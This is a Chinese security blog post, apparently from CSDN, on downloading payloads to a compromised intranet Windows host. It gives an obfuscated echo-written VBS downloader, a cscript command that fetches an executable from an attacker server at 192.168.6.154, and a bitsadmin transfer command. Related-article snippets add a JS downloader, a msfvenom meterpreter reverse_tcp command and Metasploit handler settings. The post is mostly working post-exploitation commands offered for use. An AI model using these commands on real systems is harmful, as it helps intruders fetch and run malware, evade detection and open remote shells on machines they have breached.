内网windows主机下载payload

最新推荐文章于 2024-10-18 11:17:17 发布

zwish

最新推荐文章于 2024-10-18 11:17:17 发布

阅读量700

点赞数

分类专栏：内网安全

本文链接：https://blog.youkuaiyun.com/qq_41289254/article/details/107676121

版权

当获取到内网一台windows主机时，其不能上传shell，可以执行命令，这时候可以上传或者从我们的服务器上下载payload

1、vbs

#首先先向windows写入一个vbs脚本
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2  >> downfile.vbs 

#利用windows自带的cscript执行vbs和脚本下载指定文件到windows指定位置
cscript downfile.vbs http://192.168.6.154/zwish.exe C:/Users/zw/Desktop/target.exe

2、bitsadmin

这是windows自带的工具，Windows xp以后的版本中自带该工具，例如Windows Update程序就依靠它来下载文件，但比较慢

bitsadmin /transfer 111 http://192.168.6.154/index.html C:\Users\zw\Desktop\index.html

#111为任务号

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

zwish

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

一句话下载payload（持续更新）

god_Zeo的安全博客

04-24

1605

js一句话下载payload windows 全版本都会默认支持 js，并且通过cscript 来调用达到下载 payload 的目的。 var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); Wi...

超详细！！简单使用kali中MSF渗透Windows主机操作实战，真实有效

最新发布

2401_83640658的博客

02-12

673

超详细！！简单使用kali中MSF渗透Windows主机操作实战，真实有效

参与评论您还未登录，请先登录后发表或查看评论

xss payload下载

04-03

多达5500多条xss payload提供下载，方便渗透测试人员更好地fuzz目标站点，检测xss漏洞是否存在

Payload_Dumber_x64.rar

06-15

Payload_Dumber_x64.rar

payload-dumper-win64 下载仓库

gitblog_09786的博客

10-12

861

payload-dumper-win64 下载仓库 payload-dumper-win64下载仓库本仓库提供了一个名为 `payload-dumper-win64` 的资源文件下载。该文件是一个用于Windows 64位系统的工具，主要用于处理Android设备的固件文件 ...

内网payload下载及免杀文档制作

Amire0x的小乐园

11-30

802

payload下载及免杀文档制作 payload下载 vbs 脚本如下,注意要放到一行里支持windows全系列，但对https不友好 echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile w

基于windows server的简单内网渗透

weixin_55541277的博客

06-09

3011

记录简单的基于windows server搭建的内网渗透靶场

内网权限维持——利用windows注册表

qq_55202378的博客

08-03

1277

windows自启动是指windows系统在启动时会自动允许一些程序或服务，这些程序要么是windows自带的，要么是用户安装的第三方程序。在注册表中，windows自启动程序或服务注意存储在。是windows系统的组件，用于处理与用户有关的各种行为，如扽古路、注销、在登陆时加在配置文件、锁定屏幕等。中，并执行下面命令，通过编辑注册表安装一个端口监视器。中放了一个计算器，注销后重新登录，也会弹计算器。下的注册表的修改下会应用于系统中的所有用户；下的注册表的修改只应用于当前用户。进程，以实现相应的功能。

Windows 内网渗透之横向渗透

qq_53742230的博客

07-31

3691

内网渗透之横向渗透

payload_dumper.exe

08-22

CMD使用命令payload_dumper.exe --out 分解输出目录 payload.bin所在的目录 payload_dumper.exe --out out\ out\payload.bin

Payload_Dumber_x64.7z

10-14

一加刷机包payload.bin解包工具

Payload_Dumber_x64.zip

07-04

一加刷机包payload.bin解包工具

payload_dumper-win64.zip

09-14

Payload_Dumber_x64.7z，解压手机rom中bin文件，将下载好的rom解压后出现一个不可解压的bin文件，将bin文件拖拽至payload_input目录，点击payload_dumper.exe,输出文件在payload_output文件夹中。

正版payload_dumper

05-05

用法：将payload_dumper与payload.bin在一个文件夹下，然后执行设置可执行权限，然后执行./payload_dumper就能将payload.bin解压到当前目录中

payload.bin格式解压程序.rar

04-02

payload.bin格式解压

免杀Payload生成工具Veil的下载与使用

Goodric的博客

03-28

4525

免杀Payload生成工具Veil的下载与使用 Veil是一款利用Metasploit框架生成相兼容的Payload工具，并且在大多数网络环境中能绕过常见的杀毒软件 ———— ———— 下载Veil kali 中输入指令 apt-get install veil 下载 veil（需要挺久）下载可能会出现错误，我这里提示了可能解决问题的指令。其它问题无法下载也可能需要换软件源。我这里页面显示这个，大概是说升级了libpam、libc、libssl等exe库，需要重新启动服务，就直接选Yes 了。

payload-dumper-go 项目下载及安装教程

gitblog_01206的博客

10-18

1742

payload-dumper-go 项目下载及安装教程 payload-dumper-go an android OTA payload dumper written in Go 项目地址: https://gitcode.com...

win下局域网内下载文件

lightjia的博客

02-25

970

有时我们需要在局域网中下载文件，win下可以通过共享文件夹来传输文件，而在局域网内使用系统自带API来下载文件速度比自己搭建服务器快。首先，我们要共享一个文件,WIN下首先要共享文件夹并设置无密码。直接贴代码： // ClinDataSer.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include #include #

msf-Windows payload

zzzzzyx_的博客

05-23

370

msfconsole 启动metasploit 然后 windows系统 msfvenom -p windows/meterpreter/reverse_tcp LHOST= _你的IP地址_ LPORT= _你的木马的IP地址_ -f exe > muma.exe 就这么一个不算文章的烂文章您们也就不要赏钱了下面????????的是坑钱的其实我是一个 12 岁的球娃 ...

metasploit内网穿透

01-07

set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.130 set LPORT 12345 exploit ``` 这段脚本设置了反向 TCP 的 Meterpreter 负载，并指定了本地主机地址 `LHOST` 和监听端口 `LPORT` 来准备接受...